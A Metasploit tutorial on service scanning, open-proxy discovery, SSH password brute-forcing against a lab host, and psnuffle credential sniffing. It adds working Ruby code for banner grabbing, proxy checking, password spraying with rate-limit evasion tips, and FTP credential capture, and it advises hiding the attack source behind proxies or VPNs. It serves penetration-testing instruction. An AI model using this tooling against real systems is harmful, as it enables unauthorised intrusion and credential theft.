Metasploit information gathering techniques [3]: service scanning, enumeration, password guessing and sniffing

1. Service scanning

Service enumeration: take the open ports found earlier and dig into the services running on them.
Metasploit has many modules for this, most of them under the auxiliary/scanner tree.
They are usually named [service_name]_version (sweeps hosts and identifies the service version)
or [service_name]_login (password guessing against the service).
Type search name:_version in msfconsole to list all the version-detection modules.

Network service scanning
① Telnet service scan

msf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > set rhosts 10.10.10.0/24
rhosts => 10.10.10.0/24
msf auxiliary(telnet_version) > set threads 100
threads => 100
msf auxiliary(telnet_version) > run

② SSH service scan

msf > use auxiliary/scanner/ssh/ssh_version

③ Oracle database service enumeration

msf auxiliary(ssh_version) > use auxiliary/scanner/oracle/tnslsnr_version
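What a [service_name]_version module does underneath is a banner grab per host plus a parser for that service's greeting. The Ruby below is an added example written for this page, not Metasploit's code: it reads the first line a service volunteers, parses SSH identification strings (RFC 4253 section 4.2), and runs the grab across targets with a worker pool, which is what the THREADS option controls. The target addresses, the 5-second timeout and the injectable grabber are assumptions for illustration.

```ruby
require 'socket'
require 'timeout'

# Connect, read the first line the service volunteers (SSH and FTP send
# one unprompted) and return it. Errors come back as strings so a sweep
# never aborts on one dead host.
def grab_banner(host, port, timeout: 5)
  Timeout.timeout(timeout) do
    Socket.tcp(host, port, connect_timeout: timeout) do |sock|
      sock.gets.to_s.strip
    end
  end
rescue Timeout::Error, SystemCallError, SocketError, IOError => e
  "error: #{e.class}"
end

# SSH identification string (RFC 4253 section 4.2):
#   SSH-protoversion-softwareversion SP comments CR LF
# A protoversion of "1.99" means the server speaks both protocol 1 and 2.
SSH_BANNER = /\ASSH-(?<proto>[^-]+)-(?<software>\S+)(?:\s+(?<comments>.*))?\z/

def parse_ssh_banner(line)
  m = SSH_BANNER.match(line.to_s.strip)
  return nil unless m
  { proto: m[:proto], software: m[:software], comments: m[:comments] }
end

# Worker-pool sweep over [host, port] pairs, the same idea as the module's
# THREADS option. The grabber is injectable so the logic can be exercised
# without a network (assumption: a real run uses grab_banner).
def sweep(targets, threads: 10, grabber: method(:grab_banner))
  queue = Queue.new
  targets.each { |t| queue << t }
  threads.times { queue << nil }          # one stop sentinel per worker
  results = Queue.new
  workers = Array.new(threads) do
    Thread.new do
      while (target = queue.pop)
        host, port = target
        banner = grabber.call(host, port)
        results << { host: host, port: port, banner: banner,
                     ssh: parse_ssh_banner(banner) }
      end
    end
  end
  workers.each(&:join)
  out = []
  out << results.pop until results.empty?
  out.sort_by { |r| [r[:host], r[:port]] }
end

# Usage against the lab range from the post (placeholder addresses):
#   sweep([["10.10.10.254", 22], ["10.10.10.254", 21]], threads: 100)
```

Telnet is the odd one out: a telnet server opens with IAC option-negotiation bytes rather than a text line, so gets waits for a newline that may never come and the grab times out; the real telnet_version module speaks enough of the negotiation to get past that, which is out of scope here.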

④ Open proxy detection and use
There are many ways to hide your network identity, for example proxy servers and VPNs.
The open_proxy module scans for HTTP proxies that relay requests for anyone:

msf auxiliary(tnslsnr_version) > use auxiliary/scanner/http/open_proxy

A proxy harvested from a public list comes with no security guarantee: whoever runs it can log or alter everything you send through it.
To hide the attack source you can collect free VPN services from public channels, or run your own OpenVPN server on a host you already control. Note that the range scanned in the transcript below is public address space; scan only ranges you are authorized to test.

msf > use auxiliary/scanner/http/open_proxy
msf auxiliary(open_proxy) > set SITE www.google.com
SITE => www.google.com
msf auxiliary(open_proxy) > set RHOSTS 24.25.24.1-24.25.26.254
RHOSTS => 24.25.24.1-24.25.26.254
msf auxiliary(open_proxy) > set MULTIPORTS true
MULTIPORTS => true
msf auxiliary(open_proxy) > set VERIFY_CONNECT true
VERIFY_CONNECT => true
msf auxiliary(open_proxy) > set THREADS 100
THREADS => 100
msf auxiliary(open_proxy) > run

[*] Scanned  99 of 766 hosts (12% complete)
[*] Scanned 186 of 766 hosts (24% complete)
[*] Scanned 236 of 766 hosts (30% complete)
[*] Scanned 327 of 766 hosts (42% complete)
[*] Scanned 416 of 766 hosts (54% complete)
[*] Scanned 472 of 766 hosts (61% complete)
[*] Scanned 550 of 766 hosts (71% complete)
[*] Scanned 636 of 766 hosts (83% complete)
[*] Scanned 694 of 766 hosts (90% complete)
[*] Scanned 766 of 766 hosts (100% complete)
[*] Auxiliary module execution completed
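An open-proxy check comes down to three questions: does the candidate fetch SITE when asked with an absolute-URI GET, is the answer really that site rather than a captive portal or error page that returns 200 to everything, and, with VERIFY_CONNECT, does it also accept CONNECT, the method that turns a proxy into a generic TCP relay. The Ruby below is an added example written for this page, not the open_proxy module's code; the transport is injectable, and the host names, ports and title-based pattern are illustrative assumptions.

```ruby
require 'socket'
require 'timeout'

# Send one raw request to host:port and return whatever arrives before the
# peer closes, goes idle for 3 s, or max_bytes is reached. The idle stop
# matters for CONNECT: a proxy that accepts it keeps the socket open.
# Any error returns what was read so far (usually "").
def raw_exchange(host, port, request, timeout: 15, max_bytes: 64 * 1024)
  buf = +""
  Timeout.timeout(timeout) do
    Socket.tcp(host, port, connect_timeout: timeout) do |sock|
      sock.write(request)
      loop do
        break unless IO.select([sock], nil, nil, 3)
        chunk = sock.read_nonblock(4096, exception: false)
        break if chunk.nil? || chunk == :wait_readable   # nil means EOF
        buf << chunk
        break if buf.bytesize >= max_bytes
      end
    end
  end
  buf
rescue Timeout::Error, SystemCallError, SocketError, IOError
  buf
end

# Absolute-URI GET is how a client talks to a forward proxy.
def proxy_get_request(site)
  "GET http://#{site}/ HTTP/1.1\r\nHost: #{site}\r\nConnection: close\r\n\r\n"
end

# CONNECT asks the proxy for a raw tunnel; an attacker would use it to
# relay arbitrary TCP (SSH, for instance) through the proxy.
def proxy_connect_request(site, port = 443)
  "CONNECT #{site}:#{port} HTTP/1.1\r\nHost: #{site}:#{port}\r\n\r\n"
end

def http_status(raw)
  m = raw.to_s.match(%r{\AHTTP/\d\.\d (\d{3})})
  m && m[1].to_i
end

# Classify one candidate proxy. `pattern` must match the body so that a
# captive portal answering 200 to everything is not reported as open
# (assumption: the target page carries a <title>). With verify_connect
# the proxy must also answer CONNECT with 200.
def check_proxy(host, port, site, pattern: /<title>/i, verify_connect: true,
                transport: method(:raw_exchange))
  reply = transport.call(host, port, proxy_get_request(site))
  status = http_status(reply)
  return :no_http unless status
  return :auth_required if status == 407
  return :not_open unless status == 200
  return :suspicious unless pattern.match?(reply)
  if verify_connect
    cstatus = http_status(transport.call(host, port, proxy_connect_request(site)))
    return :open_no_connect unless cstatus == 200
  end
  :open
end

# Usage (placeholder candidate):
#   check_proxy("203.0.113.10", 8080, "www.google.com")
```

To cover what MULTIPORTS and THREADS do in the module, loop check_proxy over each host and the usual proxy ports (8080, 3128, 1080, 8000 and the like) from a pool of worker threads; the verdicts above are the part worth keeping identical.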

2. Password guessing and sniffing

Building a high-quality dictionary takes social engineering: names, dates and vocabulary specific to the target.
1. SSH password guessing
Once an SSH service has been found, the ssh_login module performs password guessing against it; a good username and password dictionary is essential.
USERNAME sets a single username; USER_FILE points to a username list.
PASSWORD sets a single password; PASS_FILE points to a password list.

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 10.10.10.254
rhosts => 10.10.10.254
msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set PASS_FILE /root/words.txt
PASS_FILE => /root/words.txt
msf auxiliary(ssh_login) > set THREADS 50
THREADS => 50
msf auxiliary(ssh_login) > run

[*] SSH - Starting bruteforce
[-] SSH - Failed: 'root:'
[!] No active DB -- Credential data will not be saved!
[-] SSH - Failed: 'root:sadsa'
[-] SSH - Failed: 'root:asfgdssaas'
[-] SSH - Failed: 'root:sadasdf'
[-] SSH - Failed: 'root:we132dds'
[-] SSH - Failed: 'root:root'
[+] SSH - Success: 'root:ubuntu' 'uid=0(root) gid=0(root) groups=0(root) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 1 opened (10.10.10.128:36651 -> 10.10.10.254:22) at 2017-09-11 22:12:18 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The [!] line means msfconsole is not connected to its database, so the recovered credential is only printed. With the database connected (msfdb init, then db_status to check) it would be stored and listed by the creds command.
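The loop inside a [service_name]_login module, as an added Ruby example written for this page (not Metasploit's code): build the candidate list in the order the transcript above shows (blank password and username-as-password first, then the wordlist, matching the scanner's BLANK_PASSWORDS and USER_AS_PASS options), then spray it with a stop-on-success rule per host and a per-user attempt cap. The login attempt itself is a block, so the driver is service-agnostic; the host names, wordlist and the validator in the test are constructed. One caveat on the transcript's THREADS 50 against a single host: OpenSSH's default MaxStartups (10:30:100) starts dropping unauthenticated connections once ten are in flight, so against one sshd a much lower thread count with a small delay loses fewer guesses.

```ruby
# Candidate (user, password) pairs in the order a login scanner tries them:
# blank password and the username itself first (BLANK_PASSWORDS and
# USER_AS_PASS in Metasploit), then the wordlist. Duplicates are dropped so
# a wordlist that contains the username does not cost a second attempt.
def build_candidates(users, passwords, blank_passwords: true, user_as_pass: true)
  pairs = []
  users.each do |u|
    pairs << [u, ""] if blank_passwords
    pairs << [u, u]  if user_as_pass
    passwords.each { |p| pairs << [u, p] }
  end
  pairs.uniq
end

# Drive the guesses. The block performs one login attempt and returns true
# on success, so the same loop serves SSH, FTP or any other service.
#   stop_on_success: stop guessing a host once one credential works
#                    (STOP_ON_SUCCESS in Metasploit)
#   max_per_user:    cap attempts per user per host, for lockout thresholds
#   delay:           seconds between attempts, to stay under rate limits
#                    such as sshd MaxStartups or fail2ban
# Returns the credentials found per host and the total attempt count.
def spray(hosts, candidates, stop_on_success: true, max_per_user: nil, delay: 0)
  found = {}
  attempts = 0
  hosts.each do |host|
    per_user = Hash.new(0)
    candidates.each do |user, pass|
      next if max_per_user && per_user[user] >= max_per_user
      per_user[user] += 1
      attempts += 1
      ok = yield(host, user, pass)
      sleep(delay) if delay > 0
      next unless ok
      (found[host] ||= []) << [user, pass]
      break if stop_on_success
    end
  end
  { found: found, attempts: attempts }
end

# Usage with a real SSH library would look like (assumed, not run here):
#   spray(hosts, build_candidates(%w[root], File.readlines("/root/words.txt", chomp: true)),
#         delay: 0.5) { |h, u, p| ssh_login_ok?(h, u, p) }
```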

2. psnuffle password sniffing
psnuffle is Metasploit's password sniffer. It captures on a local interface and therefore only sees traffic that reaches the sniffing host, so it becomes useful only after you have an initial foothold inside the target network (a host on the same segment or otherwise on the traffic path). The decoders it loads are for cleartext or challenge-based protocols; it recovers nothing from SSH or TLS sessions.

msf auxiliary(ssh_login) > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > run
[*] Auxiliary module execution completed

[*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...
[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
[*] Failed FTP Login: 10.10.10.254:57922-10.10.10.129:21 >> msfadmin / msfadmin
[*] Failed FTP Login: 10.10.10.254:57922-10.10.10.129:21 >> msfadmin / 
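What psnuffle's FTP decoder does, as an added Ruby example written for this page (not the module's code): follow USER and PASS on the control channel and pair each password with the server's final 230 (success) or 530 (failure) reply, handling multi-line replies and repeated attempts on the same connection. Packet capture and TCP reassembly are left out; the input is already-reassembled control-channel lines tagged with flow and direction, and the capture in the test is constructed to mirror the transcript's addresses.

```ruby
FtpEvent = Struct.new(:flow, :user, :pass, :result)

# lines: [flow, direction, text] triples. flow identifies the TCP
# connection ("client:port-server:21"), direction is :c2s or :s2c, text is
# one control-channel line. Returns one FtpEvent per login attempt that the
# server answered with 230 or 530.
def sniff_ftp(lines)
  pending = {}   # flow => { user:, pass: } for the attempt in flight
  events = []
  lines.each do |flow, dir, text|
    text = text.to_s.strip
    st = (pending[flow] ||= {})
    if dir == :c2s
      case text
      when /\AUSER\s+(.*)\z/i then st[:user] = $1; st.delete(:pass)
      when /\APASS\s*(.*)\z/i then st[:pass] = $1   # "PASS" alone = empty pw
      end
      next
    end
    # Only the terminal line of a reply counts ("230 ...", not "230-...").
    # A 530 before PASS (e.g. user rejected) carries no password to report.
    next unless (m = text.match(/\A(\d{3}) /)) && st[:user] && st.key?(:pass)
    case m[1]
    when "230"
      events << FtpEvent.new(flow, st[:user], st[:pass], :success)
      pending.delete(flow)
    when "530"
      events << FtpEvent.new(flow, st[:user], st[:pass], :failed)
      st.delete(:pass)   # next USER/PASS on this flow is a fresh attempt
    end
  end
  events
end

# Same line shape psnuffle prints.
def format_event(e)
  label = e.result == :success ? "Successful" : "Failed"
  "#{label} FTP Login: #{e.flow} >> #{e.user} / #{e.pass}"
end
```

The flow key is what keeps interleaved connections from contaminating each other: a USER on one connection must never be paired with a PASS from another, which is exactly the mistake a naive "last USER, last PASS" sniffer makes when two clients log in at once.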